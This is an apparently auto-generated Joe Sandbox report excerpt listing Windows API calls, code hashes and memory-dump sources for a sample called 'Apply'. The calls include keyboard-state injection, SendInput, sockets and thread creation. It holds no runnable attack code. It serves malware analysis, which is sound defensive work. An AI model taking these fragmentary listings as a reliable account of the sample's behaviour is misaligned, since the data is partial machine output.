                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 1c4e4d71bc6c4cc80d9669cd9c0d2a102f460b94f4154067bf798f5f5daf5cfe
                                                    • Instruction ID: 77ef00396b725669c338058ef37f9561dbe35b09b2b34bbe9a0ff4ce4ba59810
                                                    • Opcode Fuzzy Hash: 1c4e4d71bc6c4cc80d9669cd9c0d2a102f460b94f4154067bf798f5f5daf5cfe
                                                    • Instruction Fuzzy Hash: F9411731A09607BADF217EFD8C89A7E3BA5FF02770F1C4624F429E6191E63488419363
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 008D2284
                                                    • WSAGetLastError.WSOCK32 ref: 008D2292
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 008D2311
                                                    • WSAGetLastError.WSOCK32 ref: 008D231B
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$socket
                                                    • String ID:
                                                    • API String ID: 1881357543-0
                                                    • Opcode ID: 72d044952f3799712c3c2bb71672201f9891c621ec85274667dd35434b592fd2
                                                    • Instruction ID: d48cfc2f646d1227fa32c5e725af353b0eb739ba283fd2641568fb9524ab9032
                                                    • Opcode Fuzzy Hash: 72d044952f3799712c3c2bb71672201f9891c621ec85274667dd35434b592fd2
                                                    • Instruction Fuzzy Hash: FB418A35600300AFE720AF28C886F2A77A5FB14718F54C59DF91A9F392D676ED428B91
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 008E6A3B
                                                    • ScreenToClient.USER32(?,?), ref: 008E6A6E
                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 008E6ADB
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: fbd80d232fa846dae72e7a3a1d4ba3aa9d3ad9406df65c5f7736164000ed78f2
                                                    • Instruction ID: 0898cdb40e6fc6230e7e48e720cf5dfc694e18645f2004e281ded33f6e8c757f
                                                    • Opcode Fuzzy Hash: fbd80d232fa846dae72e7a3a1d4ba3aa9d3ad9406df65c5f7736164000ed78f2
                                                    • Instruction Fuzzy Hash: D1516234900249EFCF14CF55C9809AE7BB6FF96360F108169F855DB290E730AD91CB90
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ed857308a740759f81980cce484b9e33f77ae2d94f4b6260ace311908e55dc46
                                                    • Instruction ID: 2875e2c9e779e47b4d6b9457a425336fbb758945b21bc4a156e75aa76e79d1c5
                                                    • Opcode Fuzzy Hash: ed857308a740759f81980cce484b9e33f77ae2d94f4b6260ace311908e55dc46
                                                    • Instruction Fuzzy Hash: A641D471A40718AFE724BF7CC841BAABBA9FFC8710F20452AF611DB691D771A9018781
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 008BB1AD
                                                    • SetKeyboardState.USER32(00000080), ref: 008BB1C9
                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 008BB237
                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 008BB289
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 9bc5681deb7667877d02b3b656221c64cfa2f04c025305aa6e7faf4ba4562237
                                                    • Instruction ID: 626d41f70b4259b9ad1dc167f4b106b0f4bdd74073215415a633ad5a8610fb30
                                                    • Opcode Fuzzy Hash: 9bc5681deb7667877d02b3b656221c64cfa2f04c025305aa6e7faf4ba4562237
                                                    • Instruction Fuzzy Hash: FB310630A40248AEFF358F689C057FEBBA5FF55310F08421AE495D63E1C7F49A858792
                                                    APIs
                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 008E5B12
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 008E5B35
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008E5B42
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008E5B68
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                    • String ID:
                                                    • API String ID: 3340791633-0
                                                    • Opcode ID: fcbafcf80b92610a0f33ae3492d45f88d30569666572d87b17937c2d2df9b77f
                                                    • Instruction ID: 6aadc9343e63cb328c2d2bb5ee84d6425953f48e2a2c11dd747bc0235e70ccf4
                                                    • Opcode Fuzzy Hash: fcbafcf80b92610a0f33ae3492d45f88d30569666572d87b17937c2d2df9b77f
                                                    • Instruction Fuzzy Hash: 4D31C334A55A8CBFEB349F56CC85BE93765FB46328F184112FA11D71E1C7705980DB81
                                                    APIs
                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 008BB2F2
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 008BB30E
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 008BB375
                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 008BB3C7
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 2875e43ac87d2c35d46255740cf3b5699352a3ff620d6808697a6f27628596ef
                                                    • Instruction ID: 793ea01bb870567ea3e49bacfd16ba6da140bb28c8eb993d76e3154e2373d8e1
                                                    • Opcode Fuzzy Hash: 2875e43ac87d2c35d46255740cf3b5699352a3ff620d6808697a6f27628596ef
                                                    • Instruction Fuzzy Hash: 2F31F470940348EEEF348A658814BFEBBE5FF4D324F04421AE485D63D1C3B48A458B92
                                                    APIs
                                                      • Part of subcall function 00853914: _wcslen.LIBCMT ref: 00853919
                                                    • _wcslen.LIBCMT ref: 008BE60C
                                                    • _wcslen.LIBCMT ref: 008BE623
                                                    • _wcslen.LIBCMT ref: 008BE64E
                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 008BE659
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$ExtentPoint32Text
                                                    • String ID:
                                                    • API String ID: 3763101759-0
                                                    • Opcode ID: 3e227b11d2816a4b4ab1d4955901eaaf13b1811803356a174d1ff6da173ba884
                                                    • Instruction ID: e1f4a28f32efb7c8e419e573c4e75e33ebb41470d6e251eb2306e647814065ea
                                                    • Opcode Fuzzy Hash: 3e227b11d2816a4b4ab1d4955901eaaf13b1811803356a174d1ff6da173ba884
                                                    • Instruction Fuzzy Hash: EA214171940214AFCB119FA8D982BEEB7F8FF66754F144065E808EB345D7709E41CBA2
                                                    APIs
                                                      • Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2
                                                    • GetCursorPos.USER32(?), ref: 008E96ED
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008A7D21,?,?,?,?,?), ref: 008E9702
                                                    • GetCursorPos.USER32(?), ref: 008E974A
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008A7D21,?,?,?), ref: 008E9780
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0
                                                    • Opcode ID: f69ac3a1122f86dcf5b3bb29b5e7b311353f443d975f2d0683ee8bfa9ba174f4
                                                    • Instruction ID: f8776c24ace307b677b295d4657f654d1c20e540989f7aae240e0a91d81720fd
                                                    • Opcode Fuzzy Hash: f69ac3a1122f86dcf5b3bb29b5e7b311353f443d975f2d0683ee8bfa9ba174f4
                                                    • Instruction Fuzzy Hash: 6921DE35510258FFCF258F59CC88EEA7BB9FB4A720F044165FA458B1A2C3719994EB60
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,008EDB28), ref: 008BD8E0
                                                    • GetLastError.KERNEL32 ref: 008BD8EF
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 008BD8FE
                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,008EDB28), ref: 008BD95B
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2267087916-0
                                                    • Opcode ID: 2e7af78851d87ddd414ec4ea1bff635b688aebd409a9ebebfe6c2391c7e958a0
                                                    • Instruction ID: 3f377946d67878f58affc4c17150848b99c2f3aa778f36ab6b81fcee76384227
                                                    • Opcode Fuzzy Hash: 2e7af78851d87ddd414ec4ea1bff635b688aebd409a9ebebfe6c2391c7e958a0
                                                    • Instruction Fuzzy Hash: 92217471508305EF8710DF28C88589A7FE4FE56369F104A19F4A9CB3A1EB30D94ACB53
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 008E2FC8
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008E2FE2
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008E2FF0
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 008E2FFE
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    • Opcode ID: 709ea4969a68d1e3bab779b67338c9dc08bbbab906433881791d76ca2269f894
                                                    • Instruction ID: d814c59ed3f8c4a54c725cd7707e37b011611ee6a39bcd5a4d3ebda0f776526a
                                                    • Opcode Fuzzy Hash: 709ea4969a68d1e3bab779b67338c9dc08bbbab906433881791d76ca2269f894
                                                    • Instruction Fuzzy Hash: 7321D331204691AFD7149B15CC55FAABBA9FF86324F148158F82ACB2D2CB71EC46CBD1
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 008B2129
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B213B
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B2151
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B216C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 9c9a059abd5a0b78e5e78cc155750b823b84e4dd85b2410b8340ea640e6cb543
                                                    • Instruction ID: d9e3766549f646887b8b6da66096e0e46a419c2fff08f12a753bde85de036e77
                                                    • Opcode Fuzzy Hash: 9c9a059abd5a0b78e5e78cc155750b823b84e4dd85b2410b8340ea640e6cb543
                                                    • Instruction Fuzzy Hash: 1711F77A901218FFEB119BA8CD85FDDBBB8FB48750F200091EA11B72A4D6716E11DB94
                                                    APIs
                                                      • Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2
                                                    • GetClientRect.USER32(?,?), ref: 008EA61D
                                                    • GetCursorPos.USER32(?), ref: 008EA627
                                                    • ScreenToClient.USER32(?,?), ref: 008EA632
                                                    • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 008EA666
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: b3935cba55b8c95e22928b44bf918dd034f849735ac64b26feaa3418114dc6a9
                                                    • Instruction ID: ef32e5baf79812cfd1438cf5c3938e482a3902c40eebe9c2ef36146b034d9f28
                                                    • Opcode Fuzzy Hash: b3935cba55b8c95e22928b44bf918dd034f849735ac64b26feaa3418114dc6a9
                                                    • Instruction Fuzzy Hash: 2A115E71900199ABDF14DFA9D8859EE7BB8FB16700F140461F912E7160D770FE85CBA2
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 008BE83E
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 008BE871
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008BE887
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008BE88E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0
                                                    • Opcode ID: 08e6ce5139106c3fc8f2e0b4a346d03128b035f5874850767b634787a7894630
                                                    • Instruction ID: 50c42fae9df189b8e02413abe93c4f09a89a877f50a029d5a41332924c0f9869
                                                    • Opcode Fuzzy Hash: 08e6ce5139106c3fc8f2e0b4a346d03128b035f5874850767b634787a7894630
                                                    • Instruction Fuzzy Hash: CD11E176914259BFCB11DFA89C44ACA7FA8FB45320F044265F824E7390D6B4890497E2
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,?,0087D349,00000000,00000004,00000000), ref: 0087D568
                                                    • GetLastError.KERNEL32 ref: 0087D574
                                                    • __dosmaperr.LIBCMT ref: 0087D57B
                                                    • ResumeThread.KERNEL32(00000000), ref: 0087D599
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                    • String ID:
                                                    • API String ID: 173952441-0
                                                    • Opcode ID: c52c86994235731838ee9c37d789a3bd7b87c9fc434af4db9736ac7e860dc1dd
                                                    • Instruction ID: b76e3ec4086978aa43a76bb66dbcd36ae8b289fd54dda43a0b4dc9889b6c243d
                                                    • Opcode Fuzzy Hash: c52c86994235731838ee9c37d789a3bd7b87c9fc434af4db9736ac7e860dc1dd
                                                    • Instruction Fuzzy Hash: D001C072405318ABCB206FA9DC49AAA7B79FF81734F108219F928CA1D4DB70C804C7A2
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00856709
                                                    • GetStockObject.GDI32(00000011), ref: 0085671D
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00856727
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CreateMessageObjectSendStockWindow
                                                    • String ID:
                                                    • API String ID: 3970641297-0
                                                    • Opcode ID: 5ef19afc57ebead51748b2e07f037233a33e206e71617904a88868b9b8fe9863
                                                    • Instruction ID: 7f225e4b091897894c87ef6caf0e605a7926ae0a6f8edb402a465d11e03615e5
                                                    • Opcode Fuzzy Hash: 5ef19afc57ebead51748b2e07f037233a33e206e71617904a88868b9b8fe9863
                                                    • Instruction Fuzzy Hash: 6E11ADB2101649BFDF124F949C94EEABBA9FF0C399F444205FE009A110E731DC64ABA0
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0088336A,00000364,00000000,00000000,00000000,?,008835DB,00000006,FlsSetValue), ref: 008833F5
                                                    • GetLastError.KERNEL32(?,0088336A,00000364,00000000,00000000,00000000,?,008835DB,00000006,FlsSetValue,008F3268,FlsSetValue,00000000,00000364,?,00883196), ref: 00883401
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0088336A,00000364,00000000,00000000,00000000,?,008835DB,00000006,FlsSetValue,008F3268,FlsSetValue,00000000), ref: 0088340F
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 6f368c933832b4e50a81dbf42bc887d9db2e12bea65528770b0688a5987d228a
                                                    • Instruction ID: 34b7444906d65853895ed589f79cd50a29e9dbb8d4dfd300b69961276a4cf64f
                                                    • Opcode Fuzzy Hash: 6f368c933832b4e50a81dbf42bc887d9db2e12bea65528770b0688a5987d228a
                                                    • Instruction Fuzzy Hash: C001F732611326ABC7325B78AC84E6A7758FF64FA4B210620FD16EB240D720D905C7E4
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,008BB3D4,?,00008000), ref: 008BB7C5
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,008BB3D4,?,00008000), ref: 008BB7EA
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,008BB3D4,?,00008000), ref: 008BB7F4
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,008BB3D4,?,00008000), ref: 008BB827
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
